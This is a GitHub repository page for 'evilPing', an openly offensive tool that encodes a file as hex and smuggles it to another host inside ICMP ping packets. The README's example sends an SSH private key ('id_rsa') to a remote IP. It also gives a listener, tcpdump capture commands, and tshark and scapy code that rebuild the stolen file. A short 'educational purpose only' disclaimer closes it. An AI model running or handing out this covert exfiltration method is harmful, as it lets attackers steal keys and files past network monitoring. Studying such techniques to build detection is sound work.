Skip to content

bayufedra/evilPing

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

26 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

evilPing

This tools will convert the data into hexadecimal and send through ICMP packet in each block. if the connection not stable or any packet failed to send, the script will retry sending the failed data first before go to the next block data

Usage

Usage: ./evilPing.sh <file> <host>

Example

./evilPing.sh id_rsa 192.168.1.2

Running

Listening and extract data using evilPingListener.py

sudo python3 evilPingListener.py -s 192.168.56.1 --output passwd

Listen

Listening server for receiving ICMP packet using TCPdump

sudo tcpdump -i any -s 0 'icmp' -w evilPing-received.pcap

Listen

Extract data with tshark

tshark -r evilPing-received.pcap -T fields -e data -Y "ip.src==192.168.56.1 && icmp.type==8" | tail -n +2 | cut -c 17-48 | xxd -r -p

Result

Extract data with scapy

#!/usr/bin/env python3

from scapy.all import *

src_ip = '192.168.56.1'
packet = rdpcap('evilPing-received.pcap')
data = b''

for pkt in packet[1:]:
    if pkt[IP].src == src_ip and pkt[ICMP].type == 8:
        data += pkt[Raw].load[16:32]

with open('output', 'wb') as w:
    w.write(data)

legal disclaimer

This tools is for educational purpose only. usage of evilPing for attacking targets without prior mutual consent is illegal and developers assume no liability and are not responsible for any misuse or damage caused by this program.

About

Sending file through ICMP packet using PING

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published